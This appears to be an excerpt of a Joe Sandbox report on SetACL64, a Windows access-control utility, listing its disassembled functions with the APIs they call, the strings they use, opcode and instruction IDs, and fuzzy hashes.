                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
                              • String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
                              • API String ID: 3471954800-1594087890
                              • Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                              • Instruction ID: e4a1ed9dd5080ae0d623dce17014ec4b8e431d52638a781814cf310d552d5d69
                              • Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                              • Instruction Fuzzy Hash: 4651C9A2F1978281EA249B25E4453AD63A1FB957E4F405375EA5CC3BD9EF7CE080C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                              • String ID:
                              • API String ID: 1330151763-0
                              • Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                              • Instruction ID: 2e09df35ed57b5397f5888805df9e4f86d6e56be1065bcefb7caa7602984ab0c
                              • Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                              • Instruction Fuzzy Hash: 16C1AFB2B24A4286EB20CFA9D4816AD3760FB59BE8B504365EE2ED77D4DF38D051C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
                              • String ID:
                              • API String ID: 2161274208-0
                              • Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                              • Instruction ID: 31da44f189a5a11e09a4eb5c16883fa606f0b6d08989bf66697a44825e308720
                              • Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                              • Instruction Fuzzy Hash: 2F91BDA2A19A4291EA34DB11E85437E73A1FB85BE4F445671EA5DC7798EF3CF680C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
                              • String ID: csm$csm$csm
                              • API String ID: 40297248-393685449
                              • Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                              • Instruction ID: a1a674f428fd6e7dcd5ae1e2f9c0a9d7df2a752657addbce72ad52b884103f0b
                              • Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                              • Instruction Fuzzy Hash: 24D17CB2E08B818AEB309B6598412AD77A0FB45BD8F140175EE8DD7B89DF38E591C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
                              • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
                              • API String ID: 1697026759-531884627
                              • Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                              • Instruction ID: d0c207fb06b7ee0375b04034d872873cd745b7d7c38e3ca865f8775ca97a9710
                              • Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                              • Instruction Fuzzy Hash: 22D13B76618B8186DB20DF15F4806AEB7A5FB88BD4F505136EA8D83B68EF3CD554CB00
                              APIs
                                • Part of subcall function 00007FF6970708C0: IsValidSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708E2
                                • Part of subcall function 00007FF6970708C0: GetLengthSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708F3
                              • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF697070789
                              • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF69707079C
                              • EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF697070516,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970707AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Valid$EqualLength
                              • String ID: invalid hash bucket count
                              • API String ID: 2688289545-1101463472
                              • Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                              • Instruction ID: 50c34d9ee5f35df04e8546175fcc7b5a2c88b619896d8af18c344b7784606328
                              • Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                              • Instruction Fuzzy Hash: 4651E5B6A05B81C2EB64CF12E94412D73A8FB48BD4B058676DB9DC7B94DF38E4A0C350
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
                              • String ID: asio.system
                              • API String ID: 2324539378-4188385678
                              • Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                              • Instruction ID: 57c8cc1fde356bb806a6c80d2ec63ace1a497e24226ea4db002863e42045fb4e
                              • Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                              • Instruction Fuzzy Hash: 7F318FE2A08A4285EE25DB55E9811B96360FF94BD0F0805B1DA4DC37E5EF2CE9A1D300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                              • String ID: \\?\UNC\
                              • API String ID: 2081738530-3025105874
                              • Opcode ID: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                              • Instruction ID: fb594eda63022736cc8ea67f14766799e5689a186db1d06f1bf128df56800812
                              • Opcode Fuzzy Hash: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                              • Instruction Fuzzy Hash: 663193A1A08A4281EE359F25E8401BA6360FF94BD4F1846B2DA5DC77E5EF7CF952C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
                              • String ID:
                              • API String ID: 2376240148-0
                              • Opcode ID: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                              • Instruction ID: 0622f9c239c7a9fcfbaea39a44bb9dc7912d74bdb161c8708b1f5fb2f3c95c5e
                              • Opcode Fuzzy Hash: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                              • Instruction Fuzzy Hash: 65616EB2B29A4285EB20CF65D4A43AD33A5FF44BD8F404675DA4DD7B84DE38D6858304
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: afec629c5f4bc3d22fdb666a622b719d5a39a1b1c9c1880e9f511aada66a8680
                              • Instruction ID: 952427af6bd12ed53fd67e0a158e34a776cb59ec0308e7be88b75c316c777fce
                              • Opcode Fuzzy Hash: afec629c5f4bc3d22fdb666a622b719d5a39a1b1c9c1880e9f511aada66a8680
                              • Instruction Fuzzy Hash: ECC102B2B0C78791EB799B1598002BD6BA1FBA1BC0F4442B1DA4EC7792DE7CE855C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
                              • String ID:
                              • API String ID: 2384231905-0
                              • Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                              • Instruction ID: f39b2ddd8f88ad9e41d53b8aa503fe2513415d478c7394d118f99c172d5d71a0
                              • Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                              • Instruction Fuzzy Hash: B98182B2B1564285EB20DB25E46836E3361EB84BE8F404671DA5DC77E9EE3DE580C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
                              • String ID:
                              • API String ID: 4071529928-0
                              • Opcode ID: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                              • Instruction ID: d97aee19bc855c5619fe3f8cb8ff5fb725f76665d3a9b4935664ab3d1cdfa36b
                              • Opcode Fuzzy Hash: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                              • Instruction Fuzzy Hash: 6F5193B2A0464285EB24DB25E46836E3361EB84BE8F504671DB5DC77E5EF3DE580C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                              • String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
                              • API String ID: 2967684691-1915342359
                              • Opcode ID: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                              • Instruction ID: 21724dfc0a28bbfb18c7b00882697253da9246477e7107943dec10fb919d1867
                              • Opcode Fuzzy Hash: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                              • Instruction Fuzzy Hash: 6B514AA6B09B818AFB24DBB4D4402AC33B4FF94784F049175DE4DB7A56DF38A466D304
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 3668304517-0
                              • Opcode ID: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                              • Instruction ID: 9868550ca152e49ed0041226d9e286903f6209e9fb3f5521562a65f7960ec58b
                              • Opcode Fuzzy Hash: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                              • Instruction Fuzzy Hash: 6C4191E2B1574285EF249B28D8A97AC2222EF847E8F505671EB6CC66D9DF7CD1C0C204
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF69707835D
                              • GetLastError.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF69707836B
                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF697078395
                              • FreeLibrary.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF6970783DB
                              • GetProcAddress.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF6970783E7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                              • Instruction ID: ba9cfb3d14f740f1f45ca328e8ef10ad8f6cf4870d955b81df20121e41dc5840
                              • Opcode Fuzzy Hash: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                              • Instruction Fuzzy Hash: 8931D0A2B1AA4285FE319B1AAC4157A2394FF48BE0F5905B5DE1DCB3C5EF7CE4458304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                              • Instruction ID: 61e5315dddb4ead7165a0c73c5a6c470d9e90c1dfcb5bcec1df4d173c1fb8068
                              • Opcode Fuzzy Hash: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                              • Instruction Fuzzy Hash: DE11B271B18A4182E7608B12E894729B7A4FB98FF4F040274EA6EC77A4DF7CE5448744
                              APIs
                              • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF69705F5AD), ref: 00007FF697063B8B
                              • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF69705F5AD), ref: 00007FF697063BAF
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Information
                              • String ID:
                              • API String ID: 2951059284-0
                              • Opcode ID: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                              • Instruction ID: 56437eae4e400c48d05d50a1800ff1bf3904f480a2903f9be19910b93614add8
                              • Opcode Fuzzy Hash: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                              • Instruction Fuzzy Hash: 446193A2A0864A85EB708B11E86477AB7E0EF95BD4F044171EE8EC7694DE3CE681C740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                              • String ID:
                              • API String ID: 3702003507-0
                              • Opcode ID: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
                              • Instruction ID: 246ec2f184b3b98a3fde5f80561e396c497ee4c4294bc07a2bb77316b438699e
                              • Opcode Fuzzy Hash: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
                              • Instruction Fuzzy Hash: C041B3A1A18A4185EF259B56E8041BD6371FBA5BE4F0802B1DA5DC77E5EF3CE452C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                              • String ID:
                              • API String ID: 3702003507-0
                              • Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                              • Instruction ID: 08a15b1844611b2da730d9980c764ec859e3a960bd45acf01df8f7a662967a2b
                              • Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                              • Instruction Fuzzy Hash: 1C3172A1A0CA4281FF25DB15E8411B96360EF94BD4F1C06B5DA4DC77D5EE2CE851D304
                              APIs
                              • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B638
                              • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B675
